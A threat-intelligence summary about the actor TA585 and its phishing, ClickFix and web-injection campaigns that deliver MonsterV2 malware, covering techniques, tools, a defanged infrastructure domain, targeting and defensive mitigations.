Full Report
Cybersecurity researchers have shed light on a previously undocumented threat actor called TA585 that has been observed delivering an off-the-shelf malware called MonsterV2 via phishing campaigns. The Proofpoint Threat Research Team described the threat activity cluster as sophisticated, leveraging web injections and filtering checks as part of its attack chains. "TA585 is notable because it
Analysis Summary
# Threat Actor: TA585
## Attribution & Identity
Threat actor cluster identified as **TA585**. Researchers describe them as sophisticated and notable for owning their entire attack chain, managing their own infrastructure, delivery, and malware installation internally rather than outsourcing segments. The actor behind MonsterV2 is Russian-speaking.
## Activity Summary
TA585 is actively engaged in phishing campaigns distributing the **MonsterV2** malware.
Observed campaigns include:
1. **IRS-Themed Phishing:** Using U.S. Internal Revenue Service (IRS) lures to trick users into clicking fake URLs leading to a PDF, which then directs users to a web page employing the **ClickFix** social engineering tactic. This ultimately executes a malicious command via the Windows Run dialog or PowerShell to deploy MonsterV2.
2. **Web Injection Campaigns (April 2025):** Resorting to malicious JavaScript injections on legitimate websites that serve fake CAPTCHA verification overlays to initiate infection via ClickFix, leading to MonsterV2 delivery via PowerShell.
3. **GitHub Alert Lures:** Utilizing email notifications mimicking GitHub alerts triggered by tagging users in bogus security notices, containing URLs to actor-controlled websites.
Initial campaign iterations distributed **Lumma Stealer** before switching to MonsterV2 in early 2025. The web injection infrastructure has also been linked to distribution of **Rhadamanthys Stealer**.
## Tactics, Techniques & Procedures
- **Initial Access:** Phishing via custom lures (e.g., IRS themes, fake GitHub alerts).
- **Execution Chain:** Leveraging **ClickFix** social engineering to trigger infection via malicious commands in Windows Run dialog or PowerShell.
- **Delivery:** Deploying PowerShell scripts to drop the main payload (MonsterV2).
- **Web Injection:** Injecting malicious JavaScript onto legitimate websites to display fake CAPTCHA overlays.
- **Malware Obfuscation:** MonsterV2 is typically packed using the **SonicCrypt** C++ crypter, featuring anti-analysis checks before payload decryption.
- **Evasion:** Performs anti-analysis checks (debugger/sandbox detection) upon launch.
- **Privilege Escalation:** The malware performs privilege elevation after launch.
- **C2 Communication:** Connects to Command-and-Control (C2) servers after decoding an embedded configuration.
## Targeting
- Sectors: Not explicitly limited in the description, but IRS lures suggest government/financial linkage, and the nature of the malware (stealer, HVNC) suggests broad enterprise targeting.
- Geography: Avoids infecting **Commonwealth of Independent States (CIS) countries**.
- Victims: No specific victim organizations named outside of the general targeting theme implied by the lures.
## Tools & Infrastructure
- **Malware Families Used:**
- **Primary:** MonsterV2 (RAT, stealer, loader; also known as Aurotun Stealer).
- **Previously Used:** Lumma Stealer.
- **Associated/Related:** Rhadamanthys Stealer (linked via shared infrastructure).
- **Infrastructure & Delivery Systems:**
- Actor owns and manages its delivery, infrastructure, and malware.
- Associated infrastructure for web injects includes `intlspring[.]com` (defanged).
- **Commercial Assets:** MonsterV2 is sold commercially, with "Standard" ($800/month) and "Enterprise" ($2000/month) editions available.
## Implications
TA585 represents a determined and technically capable threat actor who maintains a high degree of control over their operations, reducing reliance on external criminal enterprises. Their use of established and novel delivery techniques (ClickFix combined with web injections) and sale of a feature-rich RAT/stealer (MonsterV2) makes them a significant threat capable of data exfiltration, financial fraud (clipboard clipping), and persistent remote access (HVNC).
## Mitigations
- **Endpoint Security:** Ensure robust endpoint detection and response capable of identifying packed/crypter-protected executables and suspicious PowerShell execution chains.
- **E-mail Filtering:** Harden email gateways against IRS-themed phishing attempts and links pointing to suspicious URIs.
- **Web Application Security:** Monitor websites for signs of malicious third-party script injection, particularly those related to fake CAPTCHA overlays.
- **User Training:** Specific training against social engineering tactics like ClickFix, where users are tricked into executing commands via the Run dialog or PowerShell prompt.
- **Geo-blocking:** Organizations located outside of CIS countries should be aware they are primary targets for this malware's deployment vector.